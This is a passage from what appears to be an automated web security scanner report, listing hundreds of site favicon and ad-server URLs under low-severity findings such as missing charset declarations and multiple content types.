26.705. http://www.msha.gov/favicon.ico

26.706. http://www.mshsl.org/favicon.ico

26.707. http://www.mtsac.edu/favicon.ico

26.708. http://www.mtv.ca/favicon.ico

26.709. http://www.musclepricecars.com/favicon.ico

26.710. http://www.muskingum.edu/favicon.ico

26.711. http://www.mustangevolution.com/favicon.ico

26.712. http://www.mutualofamerica.com/favicon.ico

26.713. http://www.mychances.net/favicon.ico

26.714. http://www.mycraftcoupons.com/favicon.ico

26.715. http://www.mycurves.com/favicon.ico

26.716. http://www.myefficientplanet.com/favicon.ico

26.717. http://www.myezdeal.com/favicon.ico

26.718. http://www.myfamilytalk.com/favicon.ico

26.719. http://www.myfreecreditscore.com/favicon.ico

26.720. http://www.myfreedegree.com/favicon.ico

26.721. http://www.myhealthycat.com/favicon.ico

26.722. http://www.myip.org/favicon.ico

26.723. http://www.mylovedanal.tv/favicon.ico

26.724. http://www.mylovedasses.tv/favicon.ico

26.725. http://www.mylovedrubber.com/favicon.ico

26.726. http://www.myrtlebeach.com/favicon.ico

26.727. http://www.mysubtitles.com/favicon.ico

26.728. http://www.mytones.us/favicon.ico

26.729. http://www.mytoolstore.com/favicon.ico

26.730. http://www.nanowerk.com/favicon.ico

26.731. http://www.nationalbuildersupply.com/favicon.ico

26.732. http://www.naturalhealers.com/favicon.ico

26.733. http://www.nccde.org/favicon.ico

26.734. http://www.neaq.org/favicon.ico

26.735. http://www.needlepointers.com/favicon.ico

26.736. http://www.netfit.co.uk/favicon.ico

26.737. http://www.netminers.dk/favicon.ico

26.738. http://www.newholdonsecurity.com/favicon.ico

26.739. http://www.newjerseyshore.com/favicon.ico

26.740. http://www.newregistryrepairreviews.com/favicon.ico

26.741. http://www.newverhost.com/favicon.ico

26.742. http://www.nextmark.com/favicon.ico

26.743. http://www.nextstat.com/favicon.ico

26.744. http://www.nfib.com/favicon.ico

26.745. http://www.nfo.ph/favicon.ico

26.746. http://www.niagarafallsmarriott.com/favicon.ico

26.747. http://www.nic.ru/favicon.ico

26.748. http://www.nikonians.org/favicon.ico

26.749. http://www.nmtc.net/favicon.ico

26.750. http://www.nocccd.edu/favicon.ico

26.751. http://www.northerntrust.com/favicon.ico

26.752. http://www.nowness.com/favicon.ico

26.753. http://www.npdlink.com/favicon.ico

26.754. http://www.nu.nl/favicon.ico

26.755. http://www.nudism.ws/favicon.ico

26.756. http://www.nuffnang.com.au/favicon.ico

26.757. http://www.nwfcu.org/favicon.ico

26.758. http://www.o.biz/favicon.ico

26.759. http://www.oakgov.com/favicon.ico

26.760. http://www.oaktreevintage.com/favicon.ico

26.761. http://www.oceana.org/favicon.ico

26.762. http://www.officefurniture2go.com/favicon.ico

26.763. http://www.okhistory.org/favicon.ico

26.764. http://www.old-yearbooks.com/favicon.ico

26.765. http://www.oldchevytruck.com/favicon.ico

26.766. http://www.onedollaremailoffer.com/favicon.ico

26.767. http://www.onlineradiostations.com/favicon.ico

26.768. http://www.opensubtitles.org/favicon.ico

26.769. http://www.orlandoairports.net/favicon.ico

26.770. http://www.osbornewood.com/favicon.ico

26.771. http://www.osobnosti.cz/favicon.ico

26.772. http://www.our-hometown.com/favicon.ico

26.773. http://www.outdoorsdirectory.com/favicon.ico

26.774. http://www.outsidethebeltway.com/favicon.ico

26.775. http://www.ozgrid.com/favicon.ico

26.776. http://www.paintballforum.com/favicon.ico

26.777. http://www.pakalertpress.com/favicon.ico

26.778. http://www.palmbeachschools.org/favicon.ico

26.779. http://www.paradisefibers.net/favicon.ico

26.780. http://www.pasadena.edu/favicon.ico

26.781. http://www.patioshoppers.com/favicon.ico

26.782. http://www.pay-dayin60seconds.net/favicon.ico

26.783. http://www.paydayin-60seconds.com/favicon.ico

26.784. http://www.paytel.com/favicon.ico

26.785. http://www.pcusa.org/favicon.ico

26.786. http://www.pdfonline.com/favicon.ico

26.787. http://www.pearsonassessments.com/favicon.ico

26.788. http://www.pecentral.org/favicon.ico

26.789. http://www.pentaximaging.com/favicon.ico

26.790. http://www.peoples-law.org/favicon.ico

26.791. http://www.pfiwestern.com/favicon.ico

26.792. http://www.pgcc.edu/favicon.ico

26.793. http://www.philstart.com/favicon.ico

26.794. http://www.photostockplus.com/favicon.ico

26.795. http://www.pianostreet.com/favicon.ico

26.796. http://www.picnet.com.au/favicon.ico

26.797. http://www.picturesofengland.com/favicon.ico

26.798. http://www.pittsburghmagazine.com/favicon.ico

26.799. http://www.piworld.com/favicon.ico

26.800. http://www.planet49.com/favicon.ico

26.801. http://www.planetadeletras.com/favicon.ico

26.802. http://www.playbillstore.com/favicon.ico

26.803. http://www.playmymovs.com/favicon.ico

26.804. http://www.playpacman.net/favicon.ico

26.805. http://www.playsportstv.com/favicon.ico

26.806. http://www.pmwf.com/favicon.ico

26.807. http://www.pocketables.net/favicon.ico

26.808. http://www.podfeed.net/favicon.ico

26.809. http://www.poker.com/favicon.ico

26.810. http://www.pokerlistings.com/favicon.ico

26.811. http://www.polarispartshouse.com/favicon.ico

26.812. http://www.pollhost.com/favicon.ico

26.813. http://www.poolgeek.com/favicon.ico

26.814. http://www.poorfish.com/favicon.ico

26.815. http://www.popupbooster.com/favicon.ico

26.816. http://www.portableairshop.com/favicon.ico

26.817. http://www.portalprogramas.com/favicon.ico

26.818. http://www.postvac.com/favicon.ico

26.819. http://www.powerboatlistings.com/favicon.ico

26.820. http://www.ppcgeeks.com/favicon.ico

26.821. http://www.pponline.co.uk/favicon.ico

26.822. http://www.preloved.co.uk/favicon.ico

26.823. http://www.prensaescrita.com/favicon.ico

26.824. http://www.presidentsusa.net/favicon.ico

26.825. http://www.priestsforlife.org/favicon.ico

26.826. http://www.printsmadeeasy.com/favicon.ico

26.827. http://www.produceoasis.com/favicon.ico

26.828. http://www.promarkresearch.com/favicon.ico

26.829. http://www.promgirl.net/favicon.ico

26.830. http://www.propertyqube.com/favicon.ico

26.831. http://www.prosolutionpills.com/favicon.ico

26.832. http://www.prostate-massage-and-health.com/favicon.ico

26.833. http://www.protherapysupplies.com/favicon.ico

26.834. http://www.prudentialhomesale.com/favicon.ico

26.835. http://www.psoklahoma.com/favicon.ico

26.836. http://www.psoriasis.org/favicon.ico

26.837. http://www.publicbookshelf.com/favicon.ico

26.838. http://www.purplepug.com/favicon.ico

26.839. http://www.pusd.org/favicon.ico

26.840. http://www.q1medicare.com/favicon.ico

26.841. http://www.qualys.com/favicon.ico

26.842. http://www.racerxonline.com/favicon.ico

26.843. http://www.raiderimage.com/favicon.ico

26.844. http://www.rainbird.com/favicon.ico

26.845. http://www.rareseeds.com/favicon.ico

26.846. http://www.rats2u.com/favicon.ico

26.847. http://www.rauantiques.com/favicon.ico

26.848. http://www.raylamontagne.com/favicon.ico

26.849. http://www.re-inks.com/favicon.ico

26.850. http://www.realcareeradvice.com/favicon.ico

26.851. http://www.realestate-mls.com/favicon.ico

26.852. http://www.realestateagentsfinder.com/favicon.ico

26.853. http://www.realestatetechnologyonline.com/favicon.ico

26.854. http://www.realitytvcalendar.com/favicon.ico

26.855. http://www.realwebaudio.com/favicon.ico

26.856. http://www.recetasgratis.net/favicon.ico

26.857. http://www.recipetrove.com/favicon.ico

26.858. http://www.reddead.net/favicon.ico

26.859. http://www.redtag.com/favicon.ico

26.860. http://www.reflector.com/favicon.ico

26.861. http://www.refundsweepers.com/favicon.ico

26.862. http://www.registerstar.com/favicon.ico

26.863. http://www.relylocal.com/favicon.ico

26.864. http://www.rentawreck.com/favicon.ico

26.865. http://www.rentometer.com/favicon.ico

26.866. http://www.restaurantrow.com/favicon.ico

26.867. http://www.revues.org/favicon.ico

26.868. http://www.ricedelman.com/favicon.ico

26.869. http://www.richlandone.org/favicon.ico

26.870. http://www.rifftrax.com/favicon.ico

26.871. http://www.rigolus.com/favicon.ico

26.872. http://www.rivermarkcu.org/favicon.ico

26.873. http://www.ronstire.com/favicon.ico

26.874. http://www.rotary.org/favicon.ico

26.875. http://www.royalvegas.eu/favicon.ico

26.876. http://www.rp-online.de/favicon.ico

26.877. http://www.rpgfan.com/favicon.ico

26.878. http://www.rr-bb.com/favicon.ico

26.879. http://www.rtl.org/favicon.ico

26.880. http://www.rugdoctor.com/favicon.ico

26.881. http://www.runningroom.com/favicon.ico

26.882. http://www.runningwarehouse.com/favicon.ico

26.883. http://www.rushbackstage.com/favicon.ico

26.884. http://www.rv-clubs.us/favicon.ico

26.885. http://www.rvntracker.com/favicon.ico

26.886. http://www.rvsurplus.net/favicon.ico

26.887. http://www.rxassist.org/favicon.ico

26.888. http://www.ryland.com/favicon.ico

26.889. http://www.sa-venues.com/favicon.ico

26.890. http://www.safecompare.com/favicon.ico

26.891. http://www.salespider.com/favicon.ico

26.892. http://www.saltworks.us/favicon.ico

26.893. http://www.samsontech.com/favicon.ico

26.894. http://www.sanfranrecruiter.com/favicon.ico

26.895. http://www.saukvalley.com/favicon.ico

26.896. http://www.savevid.com/favicon.ico

26.897. http://www.sawadee.com/favicon.ico

26.898. http://www.scancafe.com/favicon.ico

26.899. http://www.scetv.org/favicon.ico

26.900. http://www.schema-root.org/favicon.ico

26.901. http://www.schneider-electric.us/favicon.ico

26.902. http://www.schuelervz.net/favicon.ico

26.903. http://www.scjohnson.com/favicon.ico

26.904. http://www.scott-sports.com/favicon.ico

26.905. http://www.scrapjazz.com/favicon.ico

26.906. http://www.seat42f.com/favicon.ico

26.907. http://www.seedrack.com/favicon.ico

26.908. http://www.sekindo.com/favicon.ico

26.909. http://www.sellingcrossing.com/favicon.ico

26.910. http://www.serialcoded.com/favicon.ico

26.911. http://www.servicecu.org/favicon.ico

26.912. http://www.sevensidedcube.net/favicon.ico

26.913. http://www.sewingmachinesplus.com/favicon.ico

26.914. http://www.sharpened.net/favicon.ico

26.915. http://www.sheezyart.com/favicon.ico

26.916. http://www.shopovertime.com/favicon.ico

26.917. http://www.shoutbox.de/favicon.ico

26.918. http://www.silobreaker.com/favicon.ico

26.919. http://www.silvercross.com/favicon.ico

26.920. http://www.simpleanddelicious.com/favicon.ico

26.921. http://www.simplybestcoupons.com/favicon.ico

26.922. http://www.site-ym.com/favicon.ico

26.923. http://www.sitebro.net/favicon.ico

26.924. http://www.sjogrens.org/favicon.ico

26.925. http://www.skateparkoftampa.com/favicon.ico

26.926. http://www.skillsurvey.com/favicon.ico

26.927. http://www.skullcandy.com/favicon.ico

26.928. http://www.sleepconnect.com/favicon.ico

26.929. http://www.slotsjam.com/favicon.ico

26.930. http://www.smartcart.com/favicon.ico

26.931. http://www.smarthomeusa.com/favicon.ico

26.932. http://www.smccme.edu/favicon.ico

26.933. http://www.smithandnoble.com/favicon.ico

26.934. http://www.snippetandink.com/favicon.ico

26.935. http://www.snowcrest.net/favicon.ico

26.936. http://www.snowforecast.com/favicon.ico

26.937. http://www.sobongo.com/favicon.ico

26.938. http://www.socializr.com/favicon.ico

26.939. http://www.solar-aid.org/favicon.ico

26.940. http://www.soundsearch.com/favicon.ico

26.941. http://www.soundspectrum.com/favicon.ico

26.942. http://www.southdakotafishing.com/favicon.ico

26.943. http://www.sovintagepatterns.com/favicon.ico

26.944. http://www.spankwireinhd.com/favicon.ico

26.945. http://www.specialops.org/favicon.ico

26.946. http://www.specialtybottle.com/favicon.ico

26.947. http://www.speedingupmypc.com/favicon.ico

26.948. http://www.speednik.com/favicon.ico

26.949. http://www.speedysigns.com/favicon.ico

26.950. http://www.splashup.com/favicon.ico

26.951. http://www.sportbikes.net/favicon.ico

26.952. http://www.sportsimportsltd.com/favicon.ico

26.953. http://www.sportsinjurybulletin.com/favicon.ico

26.954. http://www.startuphire.com/favicon.ico

26.955. http://www.state-insurance-online.com/favicon.ico

26.956. http://www.state.de.us/favicon.ico

26.957. http://www.statejournal.com/favicon.ico

26.958. http://www.steampunkworkshop.com/favicon.ico

26.959. http://www.stencilsearch.com/favicon.ico

26.960. http://www.stevespages.com/favicon.ico

26.961. http://www.stjohnprovidence.org/favicon.ico

26.962. http://www.stlbeacon.org/favicon.ico

26.963. http://www.straight.com/favicon.ico

26.964. http://www.strasburgrailroad.com/favicon.ico

26.965. http://www.stservicemovie.com/favicon.ico

26.966. http://www.studentscholarshipsearch.com/favicon.ico

26.967. http://www.sub5zero.com/favicon.ico

26.968. http://www.submissiveslavegirl.com/favicon.ico

26.969. http://www.sugarslam.com/favicon.ico

26.970. http://www.superglossary.com/favicon.ico

26.971. http://www.superiorpowersports.com/favicon.ico

26.972. http://www.supershoes.com/favicon.ico

26.973. http://www.superstreetonline.com/favicon.ico

26.974. http://www.suppview.com/favicon.ico

26.975. http://www.surnamesite.com/favicon.ico

26.976. http://www.survivaltopics.com/favicon.ico

26.977. http://www.susanireland.com/favicon.ico

26.978. http://www.susanwayland.com/favicon.ico

26.979. http://www.suzukipartshouse.net/favicon.ico

26.980. http://www.sweetiessweeps.com/favicon.ico

26.981. http://www.sweetness-light.com/favicon.ico

26.982. http://www.swissarmy.com/favicon.ico

26.983. http://www.swvatoday.com/favicon.ico

26.984. http://www.sytropin.com/favicon.ico

26.985. http://www.tahoedailytribune.com/favicon.ico

26.986. http://www.taoofherbs.com/favicon.ico

26.987. http://www.tapartoche.com/favicon.ico

26.988. http://www.targetcenter.com/favicon.ico

26.989. http://www.targetx.com/favicon.ico

26.990. http://www.tattoo-show.com/favicon.ico

26.991. http://www.tbd.com/favicon.ico

26.992. http://www.tcoasttalk.com/favicon.ico

26.993. http://www.teachingtextbooks.com/favicon.ico

26.994. http://www.teamspeak.com/favicon.ico

26.995. http://www.techstreet.com/favicon.ico

26.996. http://www.tehparadox.com/favicon.ico

26.997. http://www.teleportmyjob.com/favicon.ico

26.998. http://www.terapad.com/favicon.ico

26.999. http://www.teriskitchen.com/favicon.ico

26.1000. http://www.thatloser.com/favicon.ico

26.1001. http://www.the-cover-store.com/favicon.ico

26.1002. http://www.thebullyhouse.net/favicon.ico

26.1003. http://www.thechildrenswearoutlet.com/favicon.ico

26.1004. http://www.thecitizen.com/favicon.ico

26.1005. http://www.thecompassstore.com/favicon.ico

26.1006. http://www.thefashionpolice.net/favicon.ico

26.1007. http://www.thefirestore.com/favicon.ico

26.1008. http://www.thefreeinmatelocator.com/favicon.ico

26.1009. http://www.theinternettoday.net/favicon.ico

26.1010. http://www.theknackkids.com/favicon.ico

26.1011. http://www.thelaughtermovie.com/favicon.ico

26.1012. http://www.themanschoice.com/favicon.ico

26.1013. http://www.theoldschoolhousestore.com/favicon.ico

26.1014. http://www.therapeuticresearch.com/favicon.ico

26.1015. http://www.therealfun.com/favicon.ico

26.1016. http://www.thereareplaces.com/favicon.ico

26.1017. http://www.therumpus.net/favicon.ico

26.1018. http://www.thewitcher.com/favicon.ico

26.1019. http://www.thinkfashion.com/favicon.ico

26.1020. http://www.thomann.de/favicon.ico

26.1021. http://www.ticalc.org/favicon.ico

26.1022. http://www.ticketleap.net/favicon.ico

26.1023. http://www.ticketstub.com/favicon.ico

26.1024. http://www.time-to-run.com/favicon.ico

26.1025. http://www.tireteam.com/favicon.ico

26.1026. http://www.tnsos.org/favicon.ico

26.1027. http://www.tomthumb.com/favicon.ico

26.1028. http://www.topendsports.com/favicon.ico

26.1029. http://www.torontolife.com/favicon.ico

26.1030. http://www.totalassault.com/favicon.ico

26.1031. http://www.totalinjury.com/favicon.ico

26.1032. http://www.totallymoney.com/favicon.ico

26.1033. http://www.toviaz.com/favicon.ico

26.1034. http://www.trackemtigers.com/favicon.ico

26.1035. http://www.trade-schools.net/favicon.ico

26.1036. http://www.trade2win.com/favicon.ico

26.1037. http://www.tradearca.com/favicon.ico

26.1038. http://www.trailways.com/favicon.ico

26.1039. http://www.travelagentcentral.com/favicon.ico

26.1040. http://www.travour.com/favicon.ico

26.1041. http://www.traxnyc.com/favicon.ico

26.1042. http://www.tripplite.com/favicon.ico

26.1043. http://www.triumphrat.net/favicon.ico

26.1044. http://www.troyrecord.com/favicon.ico

26.1045. http://www.trumpinitiative.com/favicon.ico

26.1046. http://www.trustedhomeservices.com/favicon.ico

26.1047. http://www.tubedaddy.net/favicon.ico

26.1048. http://www.tubeguide.info/favicon.ico

26.1049. http://www.tucsonweekly.com/favicon.ico

26.1050. http://www.tunecore.com/favicon.ico

26.1051. http://www.turnbacktogod.com/favicon.ico

26.1052. http://www.tvb.com/favicon.ico

26.1053. http://www.tvrepairman.com/favicon.ico

26.1054. http://www.twilightersanonymous.com/favicon.ico

26.1055. http://www.twoofus.org/favicon.ico

26.1056. http://www.ualmileageplus.com/favicon.ico

26.1057. http://www.ueuo.com/favicon.ico

26.1058. http://www.ul.com/favicon.ico

26.1059. http://www.ultimate-penis-enlargement-guide.com/favicon.ico

26.1060. http://www.umassonline.net/favicon.ico

26.1061. http://www.uniqlo.com/favicon.ico

26.1062. http://www.uniquedaily.com/favicon.ico

26.1063. http://www.unknowncountry.com/favicon.ico

26.1064. http://www.upmystreet.com/favicon.ico

26.1065. http://www.uprinting.com/favicon.ico

26.1066. http://www.upskirtphotos.org/favicon.ico

26.1067. http://www.urbanministry.org/favicon.ico

26.1068. http://www.ureader.de/favicon.ico

26.1069. http://www.urnotalone.com/favicon.ico

26.1070. http://www.us-funerals.com/favicon.ico

26.1071. http://www.usa-gymnastics.org/favicon.ico

26.1072. http://www.usacitiesonline.com/favicon.ico

26.1073. http://www.usafootball.com/favicon.ico

26.1074. http://www.usagovernmentgrants.org/favicon.ico

26.1075. http://www.usamilitarymedals.com/favicon.ico

26.1076. http://www.usapaydayassistance.net/favicon.ico

26.1077. http://www.usatourist.com/favicon.ico

26.1078. http://www.usavacuum.com/favicon.ico

26.1079. http://www.uschess.org/favicon.ico

26.1080. http://www.usedforsale.biz/favicon.ico

26.1081. http://www.userfriendly.org/favicon.ico

26.1082. http://www.usherbrooke.ca/favicon.ico

26.1083. http://www.uwstout.edu/favicon.ico

26.1084. http://www.uzitalk.com/favicon.ico

26.1085. http://www.vacapedia.com/favicon.ico

26.1086. http://www.vacationrentalsad.com/favicon.ico

26.1087. http://www.valueapproved.info/favicon.ico

26.1088. http://www.vampfangs.com/favicon.ico

26.1089. http://www.vanguardmil.com/favicon.ico

26.1090. http://www.vegastripping.com/favicon.ico

26.1091. http://www.veoliaes-sw.com/favicon.ico

26.1092. http://www.verizonbusiness.com/favicon.ico

26.1093. http://www.videora.com/favicon.ico

26.1094. http://www.vikingrivers.com/favicon.ico

26.1095. http://www.vincelewis.net/favicon.ico

26.1096. http://www.virtualdj.com/favicon.ico

26.1097. http://www.virtualrabbit.com/favicon.ico

26.1098. http://www.visitmaine.net/favicon.ico

26.1099. http://www.visitmayberry.com/favicon.ico

26.1100. http://www.visitsouth.com/favicon.ico

26.1101. http://www.vivareal.us/favicon.ico

26.1102. http://www.vividracing.com/favicon.ico

26.1103. http://www.voa.org/favicon.ico

26.1104. http://www.vva.org/favicon.ico

26.1105. http://www.wackyplanet.com/favicon.ico

26.1106. http://www.warbirdinformationexchange.org/favicon.ico

26.1107. http://www.warriortalk.com/favicon.ico

26.1108. http://www.washingtonflyfishing.com/favicon.ico

26.1109. http://www.watchcartoononline.com/favicon.ico

26.1110. http://www.watchforeclosure.com/favicon.ico

26.1111. http://www.watts.com/favicon.ico

26.1112. http://www.wbu.com/favicon.ico

26.1113. http://www.wccls.org/favicon.ico

26.1114. http://www.wcsh6.com/favicon.ico

26.1115. http://www.wcwelding.com/favicon.ico

26.1116. http://www.wdasfm.com/favicon.ico

26.1117. http://www.we7.com/favicon.ico

26.1118. http://www.web-stat.net/favicon.ico

26.1119. http://www.webdesign.org/favicon.ico

26.1120. http://www.webreference.com/favicon.ico

26.1121. http://www.wect.com/favicon.ico

26.1122. http://www.weldershop.info/favicon.ico

26.1123. http://www.wellnessletter.com/favicon.ico

26.1124. http://www.wengers.com/favicon.ico

26.1125. http://www.werdyo.com/favicon.ico

26.1126. http://www.werner.com/favicon.ico

26.1127. http://www.westathome.com/favicon.ico

26.1128. http://www.westendmotorsports.com/favicon.ico

26.1129. http://www.westport-news.com/favicon.ico

26.1130. http://www.whatsonxiamen.com/favicon.ico

26.1131. http://www.wheelessonline.com/favicon.ico

26.1132. http://www.wholesalecostumeclub.com/favicon.ico

26.1133. http://www.wholesaledir.com/favicon.ico

26.1134. http://www.wholesalefloral.com/favicon.ico

26.1135. http://www.whonamedit.com/favicon.ico

26.1136. http://www.wichealth.org/favicon.ico

26.1137. http://www.wideanglesoftware.com/favicon.ico

26.1138. http://www.wikifeet.com/favicon.ico

26.1139. http://www.wildernesscollege.com/favicon.ico

26.1140. http://www.willistonherald.com/favicon.ico

26.1141. http://www.willyouhost.com/favicon.ico

26.1142. http://www.windows-vista-update.com/favicon.ico

26.1143. http://www.windsorstore.com/favicon.ico

26.1144. http://www.wingstuff.com/favicon.ico

26.1145. http://www.winhelponline.com/favicon.ico

26.1146. http://www.winnipesaukee.com/favicon.ico

26.1147. http://www.wireless-driver.com/favicon.ico

26.1148. http://www.wofford.edu/favicon.ico

26.1149. http://www.womensenews.org/favicon.ico

26.1150. http://www.wood-stove.org/favicon.ico

26.1151. http://www.woodheat.org/favicon.ico

26.1152. http://www.woodnet.net/favicon.ico

26.1153. http://www.woodsmith.com/favicon.ico

26.1154. http://www.woodworking.com/favicon.ico

26.1155. http://www.woodworking4home.com/favicon.ico

26.1156. http://www.woodys-auto-supply.com/favicon.ico

26.1157. http://www.wordplays.com/favicon.ico

26.1158. http://www.worksourceoregon.org/favicon.ico

26.1159. http://www.world-import.com/favicon.ico

26.1160. http://www.worldgroups.com/favicon.ico

26.1161. http://www.worldwidedx.com/favicon.ico

26.1162. http://www.wrestlewithjimmy.net/favicon.ico

26.1163. http://www.wrhardware.com/favicon.ico

26.1164. http://www.wri.org/favicon.ico

26.1165. http://www.wrinklebest.com/favicon.ico

26.1166. http://www.wten.com/favicon.ico

26.1167. http://www.wwwamericanclassifieds.com/favicon.ico

26.1168. http://www.x-tremegeek.com/favicon.ico

26.1169. http://www.xaapa.com/favicon.ico

26.1170. http://www.xstreetsl.com/favicon.ico

26.1171. http://www.yardbarker.com/javascripts/all.js

26.1172. http://www.ymlp163.com/favicon.ico

26.1173. http://www.ymlp188.com/favicon.ico

26.1174. http://www.youhoro.info/favicon.ico

26.1175. http://www.youreviewelectronics.com/favicon.ico

26.1176. http://www.youthfire.com/favicon.ico

26.1177. http://www.yuddy.com/favicon.ico

26.1178. http://www.zapak.com/favicon.ico

26.1179. http://www.zara.com/favicon.ico

26.1180. http://www.zdnetasia.com/favicon.ico

26.1181. http://www.zegeridotc.com/favicon.ico

27. Cacheable HTTPS response

28. Multiple content types specified

28.1. http://www.fellowes.com/favicon.ico

28.2. http://www.freeltcquotes.com/favicon.ico

29. HTML does not specify charset

29.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8

29.2. http://ad.yieldmanager.com/iframe3

29.3. http://ads.pointroll.com/PortalServe/

29.4. http://ads.specificmedia.com/serve/v=5

29.5. http://afe.specificclick.net/

29.6. http://d13.zedo.com/OzoDB/cutils/R53_5/jsc/1190/zpu.html

29.7. http://d3.zedo.com/jsc/d3/ff2.html

29.8. http://www.670kboi.com/favicon.ico

29.9. http://www.a1freesoundeffects.com/favicon.ico

29.10. http://www.adsomega.com/favicon.ico

29.11. http://www.aionarmory.com/favicon.ico

29.12. http://www.airgunsofarizona.com/favicon.ico

29.13. http://www.alanskitchen.com/favicon.ico

29.14. http://www.am570radio.com/favicon.ico

29.15. http://www.amateursgfs.com/favicon.ico

29.16. http://www.amospublishing.com/favicon.ico

29.17. http://www.arnottindustries.com/favicon.ico

29.18. http://www.artscraftsshowbusiness.com/favicon.ico

29.19. http://www.ashmax.com/favicon.ico

29.20. http://www.bajafresh.com/favicon.ico

29.21. http://www.baylinerownersclub.org/favicon.ico

29.22. http://www.best18teens.com/favicon.ico

29.23. http://www.bestcontactform.com/favicon.ico

29.24. http://www.bigblackass.tv/favicon.ico

29.25. http://www.bizmove.com/favicon.ico

29.26. http://www.blackgold.org/favicon.ico

29.27. http://www.bloxnine.com/favicon.ico

29.28. http://www.brenhambanner.com/favicon.ico

29.29. http://www.bullied-by-her-dad.info/favicon.ico

29.30. http://www.carolinarustica.com/favicon.ico

29.31. http://www.carsondellosa.com/favicon.ico

29.32. http://www.cheaptalkwireless.com/favicon.ico

29.33. http://www.chemicalelements.com/favicon.ico

29.34. http://www.collegegfs.com/favicon.ico

29.35. http://www.colormecontacts.com/favicon.ico

29.36. http://www.corning.com/favicon.ico

29.37. http://www.costore.com/favicon.ico

29.38. http://www.crowleymarine.com/favicon.ico

29.39. http://www.crystal-co.com/favicon.ico

29.40. http://www.d2jsp.org/favicon.ico

29.41. http://www.dailynylongalleries.com/favicon.ico

29.42. http://www.deguate.com/favicon.ico

29.43. http://www.deltasigmatheta.org/favicon.ico

29.44. http://www.donrearic.com/favicon.ico

29.45. http://www.duplinschools.net/favicon.ico

29.46. http://www.eeteen.com/favicon.ico

29.47. http://www.eighteenmovs.com/favicon.ico

29.48. http://www.englishpage.com/favicon.ico

29.49. http://www.examiner-enterprise.com/favicon.ico

29.50. http://www.exoticnudism.com/favicon.ico

29.51. http://www.extremegrannytube.com/favicon.ico

29.52. http://www.eyny.com/favicon.ico

29.53. http://www.fantastictrans.com/favicon.ico

29.54. http://www.farmland.org/favicon.ico

29.55. http://www.fat-angels.com/favicon.ico

29.56. http://www.feed2js.org/favicon.ico

29.57. http://www.fightpp.org/favicon.ico

29.58. http://www.flektor.com/favicon.ico

29.59. http://www.foxsportskansascity.com/common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1

29.60. http://www.fozthumbs.com/favicon.ico

29.61. http://www.free-shit-sites.com/favicon.ico

29.62. http://www.freeboatshopper.com/favicon.ico

29.63. http://www.french-girls.net/favicon.ico

29.64. http://www.futuretoolbars.com/favicon.ico

29.65. http://www.gamewack.com/favicon.ico

29.66. http://www.gasparinutrition.com/favicon.ico

29.67. http://www.gecu-ep.org/favicon.ico

29.68. http://www.getastrology.com/favicon.ico

29.69. http://www.goldmaturetube.net/favicon.ico

29.70. http://www.greatnow.com/favicon.ico

29.71. http://www.greatteengirl.com/favicon.ico

29.72. http://www.greenway.org/favicon.ico

29.73. http://www.hairymature.org/favicon.ico

29.74. http://www.hairystars.com/favicon.ico

29.75. http://www.hairytravel.net/favicon.ico

29.76. http://www.helloindianapolis.com/favicon.ico

29.77. http://www.helminc.com/favicon.ico

29.78. http://www.heraldpalladium.com/favicon.ico

29.79. http://www.hijackthis.de/favicon.ico

29.80. http://www.homefindingbook.com/favicon.ico

29.81. http://www.hot-mom.org/favicon.ico

29.82. http://www.hotmamamature.com/favicon.ico

29.83. http://www.hotvintagetube.com/favicon.ico

29.84. http://www.hqgrannypics.com/favicon.ico

29.85. http://www.hvacagent.com/favicon.ico

29.86. http://www.hziegler.com/favicon.ico

29.87. http://www.ibmsaudio.com/favicon.ico

29.88. http://www.ihiremanufacturing.com/favicon.ico

29.89. http://www.ihireretail.com/favicon.ico

29.90. http://www.ihop.org/favicon.ico

29.91. http://www.islamfortoday.com/favicon.ico

29.92. http://www.journalinquirer.com/favicon.ico

29.93. http://www.journalofaccountancy.com/favicon.ico

29.94. http://www.jrward.com/favicon.ico

29.95. http://www.kerbeck.com/favicon.ico

29.96. http://www.kidk.com/favicon.ico

29.97. http://www.kuryakyn.com/favicon.ico

29.98. http://www.latinspicebabes.com/favicon.ico

29.99. http://www.linkblur.com/favicon.ico

29.100. http://www.little-tiny.net/favicon.ico

29.101. http://www.louisvilleky.gov/favicon.ico

29.102. http://www.lumens.com/favicon.ico

29.103. http://www.mailfinity.net/favicon.ico

29.104. http://www.maleindress.com/favicon.ico

29.105. http://www.manchesterairport.com/favicon.ico

29.106. http://www.manga31.com/favicon.ico

29.107. http://www.maturevideoclips.net/favicon.ico

29.108. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+'

29.109. http://www.mdnr-elicense.com/favicon.ico

29.110. http://www.meettheboss.tv/favicon.ico

29.111. http://www.megateengalls.com/favicon.ico

29.112. http://www.mercadolivre.com.br/favicon.ico

29.113. http://www.mercagames.com/favicon.ico

29.114. http://www.methodisthealth.org/favicon.ico

29.115. http://www.million-movies.com/favicon.ico

29.116. http://www.millionlooks.com/favicon.ico

29.117. http://www.momspussies.com/favicon.ico

29.118. http://www.moneyfactory.gov/favicon.ico

29.119. http://www.myezdeal.com/favicon.ico

29.120. http://www.myfreedegree.com/favicon.ico

29.121. http://www.myspacecursor.net/favicon.ico

29.122. http://www.nascigs.com/favicon.ico

29.123. http://www.newscanary.com/favicon.ico

29.124. http://www.noah-health.org/favicon.ico

29.125. http://www.oldmanwish.com/favicon.ico

29.126. http://www.outsideinfo.com/favicon.ico

29.127. http://www.outsidethebeltway.com/favicon.ico

29.128. http://www.pakalertpress.com/favicon.ico

29.129. http://www.pemonitorhosted.com/favicon.ico

29.130. http://www.perfectgirlsclub.com/favicon.ico

29.131. http://www.pipedomain.com/favicon.ico

29.132. http://www.presidentsusa.net/favicon.ico

29.133. http://www.private-teen-movies.com/favicon.ico

29.134. http://www.privatemomsvideos.com/favicon.ico

29.135. http://www.procarcare.com/favicon.ico

29.136. http://www.projectguitar.com/favicon.ico

29.137. http://www.propertyqube.com/favicon.ico

29.138. http://www.psoklahoma.com/favicon.ico

29.139. http://www.raftergrafting.com/favicon.ico

29.140. http://www.reflector.com/favicon.ico

29.141. http://www.registerstar.com/favicon.ico

29.142. http://www.rentawreck.com/favicon.ico

29.143. http://www.restaurantrow.com/favicon.ico

29.144. http://www.rogerssportinggoods.com/favicon.ico

29.145. http://www.rosscountyfair.com/favicon.ico

29.146. http://www.runningwarehouse.com/favicon.ico

